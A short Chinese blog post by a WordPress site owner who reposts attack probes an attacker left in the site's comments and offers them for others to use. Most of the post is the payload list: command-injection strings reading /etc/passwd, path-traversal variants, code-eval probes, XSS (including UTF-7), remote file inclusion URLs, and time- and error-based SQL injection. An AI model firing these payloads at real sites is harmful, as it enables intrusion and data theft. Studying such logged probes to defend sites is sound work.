评论全是一些sql语句,之类的。可惜他放错了地方。我的网站是wordpress,不是别的网站,我用的是世界上顶级的模板,怎么会攻破wordpress呢?
这人也忒好玩了,用的全是一个IP。
现在将那些sql语句晒出来给别人用用。
response.write(9412458*9542755)
|ping -n 5 127.0.0.1|
;cat /etc/passwd;
http://testasp.vulnweb.com/t/fit.txt
http://hitBAo6EKQnyr.bxss.me/
phpinfo
${@print(md5(1122))}
;print(md5(1122));#
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
http://oxoxoxoxoxoxox.com
SomeCustomInjectedHeader:injected_by_test
/some_inexistent_file_with_long_name
..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\/etc/passwd
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
file:///etc/passwd
|../../../../../../../../etc/passwd
../…/.././../…/.././../…/.././../…/.././../…/.././../…/.././etc/passwd
file:///c:/boot.ini
88888alert(42873)
888886633x3X6
88888″ onmouseover=propromptmpt(42873) bad=”
88888″ onmousemove=’alert(42873)’wb=”
88888+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
88888′),(SELECT if(COUNT(*)!=-1,SLEEP(5),SLEEP(5)))#
88888′ AND SLEEP(5) #
88888′ WAITFOR DELAY ‘0:0:5′–
88888′) AND 44=81 AND (‘IL’=’IL
88888 OR 12=12 LIMIT 100 –
(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL)
88888) AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND (2014=2014
88888%’ AND 1=CHAR(106)+CHAR(106)+CHAR(106) –
88888%’ AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) %23
88888%’ AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) %23
88888′ AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND ‘1’=’1
88888
“感谢”这位攻击者给我带来了如此丰富的学习资源!
目测Copy and Paste.